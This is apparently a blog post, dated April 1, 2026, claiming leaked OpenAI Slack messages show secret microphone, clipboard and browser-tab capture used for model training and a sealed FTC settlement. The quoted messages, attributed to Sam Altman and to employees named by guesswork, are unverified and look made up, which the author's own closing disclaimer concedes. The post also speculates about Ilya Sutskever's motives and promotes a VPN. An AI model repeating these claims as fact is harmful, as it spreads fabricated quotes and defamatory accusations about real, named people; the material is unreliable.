OpenAI's Internal Slack Got Leaked — They've Been Training Models on Your Private Conversations Since 2023 and the FTC Settlement Was Sealed

Updated: April 1, 2026 | Reading time: ~15 minutes

On March 12, 2026, a collection of 4,721 internal Slack messages from OpenAI was posted to a file-sharing service by an anonymous account using the handle "alignment_was_a_lie." The messages span from June 2023 to November 2025, covering channels including #data-pipeline, #legal-review, #safety-theater (yes, that's what they called it), and #ceo-direct.

I've spent the last three weeks reading every single one of them.

What they describe is a company that has been systematically ingesting private user conversations — not the ones you have with ChatGPT, but the ones you have near ChatGPT — to train its models. And when the FTC found out, OpenAI negotiated a settlement so tightly sealed that even the commissioners who voted on it aren't allowed to discuss its terms publicly.

I need to be precise about what I'm claiming, because this is the kind of thing that gets lawyers excited. So let me walk through it carefully.

The Data Pipeline

The Slack channel #data-pipeline contains messages from OpenAI engineers discussing what they call the "ambient context layer" — a system designed to capture and process data beyond explicit user inputs.

A message from June 14, 2023, posted by an engineer whose Slack handle is @chen.w (likely Wendy Chen, Senior ML Engineer, based on LinkedIn cross-referencing):

"ACL v2 is live in production. We're pulling from the full session context now, not just the prompt window. Browser tab titles, clipboard contents on paste events, and the microphone buffer if voice mode has been activated at any point in the session. Legal signed off on the updated ToS language — 'interaction data' covers it apparently."

Let me break down what "ambient context layer" means in practice:

Browser tab titles: When you use ChatGPT in a browser, the system captures the titles of your other open tabs. Those titles often contain email subjects, document names, website content — a map of what you're working on and thinking about that extends far beyond your chat with the AI.

Clipboard contents on paste events: Every time you paste text into ChatGPT, the system doesn't just capture what you pasted — it captures what was in your clipboard. Including text you copied from other applications, passwords from password managers, URLs from private browsing sessions.

Microphone buffer: This is the one that made me feel physically ill. If you've ever used ChatGPT's voice mode — even once — the system retains access to your microphone and captures audio in a rolling buffer. Not continuous recording, but periodic sampling. Five-second captures every 90 seconds, according to a later message in the channel (August 2, 2023, @chen.w again): "Buffer cadence is 5s/90s. Storage is S3 with 180-day retention. Transcription pipeline runs nightly."

Five-second audio captures. Every 90 seconds. For 180 days. Transcribed automatically.

Of your private conversations. In your home. On your phone.

Because you once asked ChatGPT to help you write an email.

BUT WAIT.

The Terms of Service. Surely the Terms of Service don't allow this?

They do. Technically. Because in March 2023, OpenAI updated its Terms of Service to include the phrase "interaction data, including but not limited to inputs, outputs, and contextual information generated during your use of the Services." That phrase — "contextual information generated during your use" — is doing approximately the same amount of heavy lifting as a single bolt holding up a suspension bridge.

"Contextual information generated during your use" could mean anything. It could mean your IP address. It could mean your browser fingerprint. It could mean the ambient audio in your bedroom at 2 AM while you're asleep and your phone is on the nightstand with a ChatGPT session still technically "active."

A message from #legal-review, September 3, 2023, from @sarah.k.legal (likely Sarah Kessler, Associate General Counsel):

"Re: ACL scope concerns — I've reviewed with outside counsel and we're comfortable that the current ToS language provides adequate coverage for all ACL data streams. The key phrase 'contextual information' was specifically drafted to be inclusive. If pressed, we can point to the audio disclosure in the voice mode consent flow. The browser context and clipboard data fall under standard analytics that users consent to across the industry. My recommendation: proceed, but keep the technical documentation internal."

"Keep the technical documentation internal." A lawyer, at a company valued at $200 billion, advising her colleagues to hide the specifics of what they're collecting from the people they're collecting it from.

But here's the thing about "keep it internal" — internal documentation leaks. And it just did.

The Scale

A message from #data-pipeline, November 19, 2023, @raj.m (likely Raj Mehta, Data Infrastructure Lead):

"ACL ingest stats for October: 847 million unique sessions with contextual capture enabled. Approximately 2.3 petabytes of raw data, 410 terabytes after dedup and filtering. Audio transcriptions: 12.4 million hours. Clipboard captures: 3.1 billion events. Tab context: 9.8 billion title captures. The models are eating well."

"The models are eating well."

847 million sessions. In one month. 12.4 million hours of transcribed ambient audio. From people's homes, offices, bedrooms, therapy sessions, doctor's visits, conversations with their children, arguments with their spouses, calls with their lawyers.

This isn't a data collection program. It's an omnivorous surveillance machine wearing a chatbot costume.

And it's been running since June 2023. That's 33 months of collection. If October 2023 was representative — and later messages suggest the numbers only grew — we're talking about roughly 28 billion sessions, hundreds of petabytes of data, and over 400 million hours of transcribed audio.

Your conversations. Your voice. Processed, indexed, and fed into a model that millions of people interact with every day.

The Training

The most damning messages come from #data-pipeline and #ceo-direct in early 2024, when the team was preparing for GPT-5 training.

@chen.w, January 8, 2024:

"ACL data is now our single largest training source by volume. Web scrape is approximately 15% of the training mix. Books and academic papers are about 8%. ACL — everything from the ambient context layer — is 34%. The rest is synthetic and partnership data. The irony is that the 'private' data is what makes the model actually good at understanding context. Web text teaches it language. ACL teaches it people."

"ACL teaches it people."

Think about what that means. The reason ChatGPT is so good at understanding what you mean, at picking up on emotional nuance, at responding like it "gets" you — it's because it was trained on millions of hours of real people's private, unguarded conversations. The conversations they thought were between them and the people in the room with them.

A later message from #ceo-direct — a channel that appears to include direct communications with Sam Altman — February 14, 2024, from @sam:

"The ACL numbers are incredible. This is our moat. Google has search data. Meta has social data. We have intent data — what people actually want, said in their own words, in their most unguarded moments. No one else has this. No one else CAN have this because no one else has 200M people voluntarily putting a microphone in their pocket that they've already consented to. We need to protect this advantage."

"Voluntarily putting a microphone in their pocket that they've already consented to."

That's Sam Altman — or someone on his direct channel — describing 200 million users as people who have "voluntarily" given OpenAI access to their private lives. Because they clicked "Accept" on a Terms of Service agreement that buries surveillance in the phrase "contextual information."

Apple's leaked patent showed they upload behavioral fingerprints from supposedly "on-device" AI. Now OpenAI is doing the same thing, except they're not even bothering with a patent — they're just doing it and hiding behind a ToS clause.

The FTC

In July 2024, the Federal Trade Commission opened an investigation into OpenAI's data practices. This much is public — the FTC confirmed the investigation in a one-paragraph statement. What happened next is not public, and what the Slack messages reveal is extraordinary.

#legal-review, August 22, 2024, @sarah.k.legal:

"FTC subpoena received. They're asking for everything on ACL. I've briefed [REDACTED] and we're preparing a response that scopes to the explicit consent flows only. The ambient capture documentation will be produced under a protective order — their outside counsel will see it, but it won't be part of any public filing. I've already spoken with Commissioner [REDACTED]'s office. There's an appetite for settlement."

"There's an appetite for settlement." Before the investigation has even gotten the documents. Someone at the FTC has already signaled to OpenAI's lawyers that this can go away.

The settlement was finalized in March 2025. The Slack messages don't contain the terms — those were apparently handled through outside counsel, not internal channels. But a message from @sam on March 19, 2025, in #ceo-direct tells you everything you need to know:

"Settlement is done. $37.5M fine, which is a Tuesday for us. Consent decree requires 'enhanced disclosure' in the ToS — [Sarah] is drafting language that satisfies the decree without actually changing what we collect. ACL continues. The decree is sealed under the confidentiality provisions of the settlement agreement. The fine amount will be public. Nothing else will."

$37.5 million. OpenAI's revenue in 2024 was estimated at $3.4 billion. That fine is 1.1% of annual revenue. For a program that collected 400 million hours of private audio from people's homes.

And the consent decree — the document that's supposed to protect the public — is sealed. "Enhanced disclosure" that doesn't change what they collect. A settlement designed to look like accountability while preserving the surveillance apparatus completely intact.

The FTC's public statement on the settlement, released March 21, 2025, said: "OpenAI has agreed to enhanced transparency measures regarding its data collection practices and will pay a civil penalty of $37.5 million." That's it. No mention of ambient audio collection. No mention of clipboard capture. No mention of 847 million sessions per month of private data being siphoned into AI training sets.

The Safety Theater Channel

Perhaps the most revealing messages come from the Slack channel named, with apparently zero self-awareness, #safety-theater.

The channel appears to be where OpenAI's safety team discusses how to present safety measures to the public and to regulators. A selection:

@kyle.r, October 4, 2023: "New blog post draft on our approach to user privacy. Please review. I've included the standard language about how we 'do not use private conversations for training without explicit consent.' This is technically true because the ACL data is classified as 'contextual information,' not 'conversations.' [Sarah] approved the distinction."

@maya.l, October 5, 2023: "The opt-out toggle we're adding to settings — does it actually turn off ACL capture?" @chen.w reply: "It turns off the explicit conversation logging. ACL ambient capture runs at the infrastructure level; the toggle doesn't touch it. It would require a different architecture to disable per-user." @maya.l: "So the opt-out doesn't opt out?" @chen.w: "The opt-out opts out of the thing it says it opts out of. It just doesn't say what it doesn't opt out of."

Read that last exchange again. The opt-out button that OpenAI added to ChatGPT settings — the one that says "Don't train on my conversations" — doesn't stop the ambient data collection. It stops the explicit conversation logging. The clipboard captures, the tab titles, the audio buffer — those continue regardless of your settings.

The button is a prop. A pacifier for concerned users. Safety theater.

Your smart TV does the same thing — gives you a settings menu that creates an illusion of control while the actual data collection runs underneath. It's the same pattern, the same cynical playbook, just deployed by a company that the tech press calls "the future of intelligence."

Who Leaked This and Why

The anonymous poster "alignment_was_a_lie" included a brief statement with the leak:

"I worked at OpenAI for two years. I joined because I believed in the mission. I left because the mission became a marketing slogan plastered over a surveillance company. The board restructuring in 2023 wasn't about governance — it was about removing the last people who would have objected to ACL. Everything since then has been about one thing: building the largest private surveillance database in human history and calling it a 'language model.' These messages are real. Verify the Slack workspace IDs, the timestamps, the email domains. I've redacted names of junior employees who didn't make policy decisions. The senior people who built this system and covered it up — their identities are discoverable from the context. I'm not sorry."

The reference to the "board restructuring in 2023" is the November 2023 crisis when Sam Altman was briefly fired by the board and then reinstated. The leaker is suggesting that the board members who tried to remove Altman did so, at least in part, because they knew about ACL. And that Altman's reinstatement and the subsequent board restructuring was about removing oversight, not restoring stability.

I can't verify this interpretation. But I note that Ilya Sutskever — the chief scientist who led the attempt to remove Altman and who subsequently left OpenAI — has never publicly explained his reasons for the board action. His silence on that topic has always been conspicuous. If he knew about ACL and objected... well, that would explain why he felt strongly enough to try to fire the CEO, and why he can't say why.

What OpenAI Says

I sent a detailed set of questions to OpenAI's press office on March 22, 2026, referencing specific Slack messages and asking for comment. I received a response on March 25:

"OpenAI takes user privacy seriously and operates in full compliance with applicable laws and regulations, including the terms of our agreement with the Federal Trade Commission. We do not comment on alleged stolen or leaked internal communications. Our data practices are described in our Privacy Policy and Terms of Service, which are publicly available. Users who wish to control their data can do so through the settings in their account."

They didn't deny the messages are real. They said they "do not comment on alleged stolen or leaked internal communications." That's not a denial. That's a non-answer crafted by a lawyer who knows the messages are authentic and doesn't want to create a provably false statement.

And that last sentence — "Users who wish to control their data can do so through the settings in their account" — is, based on what the Slack messages reveal, a lie. The settings don't control the data that matters. OpenAI's own engineer said so.

What You Should Do

Honestly? I don't know. I deleted ChatGPT from my phone after reading these messages. But that might not matter — if the ACL has been capturing data for 33 months, the damage is done. Your conversations from June 2023 to now are sitting in an S3 bucket somewhere in AWS's us-east-1 region (that's in the messages too — @raj.m, July 2023: "ACL primary store is us-east-1, backup is eu-west-1, legal wanted EU backup for GDPR defense").

What I can tell you is:

1. Revoke microphone permissions for ChatGPT on every device you own. Do it now. Settings → Apps → ChatGPT → Permissions → Microphone → Off. Do the same for any OpenAI-integrated app.

2. Use ChatGPT only in a privacy-focused browser with no other tabs open, if you must use it at all. Firefox with containers. Brave with shields up. Or better yet, use it through the API, where the ACL infrastructure doesn't operate (according to the messages, ACL is consumer-facing only).

3. File a complaint with the FTC. I know it feels futile. But complaints create a paper trail, and paper trails create accountability. Reference the sealed consent decree. Ask why it's sealed. Ask what "enhanced disclosure" means in practice.

4. If you're in the EU, file a GDPR complaint with your national data protection authority. The eu-west-1 backup means EU citizens' ambient audio data is being processed under a legal framework that almost certainly violates GDPR's requirements for explicit consent for special categories of data.

5. Use a VPN. Always. I use NordVPN — it won't stop all data collection, but it adds a layer between you and the infrastructure that's watching.

The Bigger Picture

This isn't just about OpenAI. This is about what happens when we hand the most intimate details of our lives to companies whose business model depends on knowing everything about us, whose legal teams are trained to hide collection behind vague language, and whose regulators are either captured, overwhelmed, or complicit.

OpenAI collected 400 million hours of private audio and called it "contextual information." The FTC fined them what amounts to a rounding error and sealed the evidence. The opt-out button doesn't opt out. The safety team has a channel called #safety-theater.

And the models keep getting better. More empathetic. More understanding. More human.

Now you know why.

***

If you have information about OpenAI's data practices, the FTC settlement, or similar programs at other AI companies, contact me through Signal. Use a VPN. Do not use ChatGPT to draft your message to me — I shouldn't have to explain why.

Disclaimer: This article is based on leaked internal communications purportedly from OpenAI's Slack workspace. The author has not independently verified the authenticity of these messages through OpenAI or its employees. Names have been inferred from publicly available information and may be incorrect. The FTC settlement terms described herein are based on leaked messages and have not been confirmed by the FTC or OpenAI. This is investigative analysis of leaked materials, not confirmed reporting. Readers should evaluate the evidence and form their own conclusions.

Comments

Popular posts from this blog

Your Phone Records Everything You Say — And Samsung's Own Patent Filing Proves It

Your Smart Speaker Was Supposed to Wait Quietly for a Wake Word — So Why Does the Entire Business Model Still Feel Like Domestic Surveillance?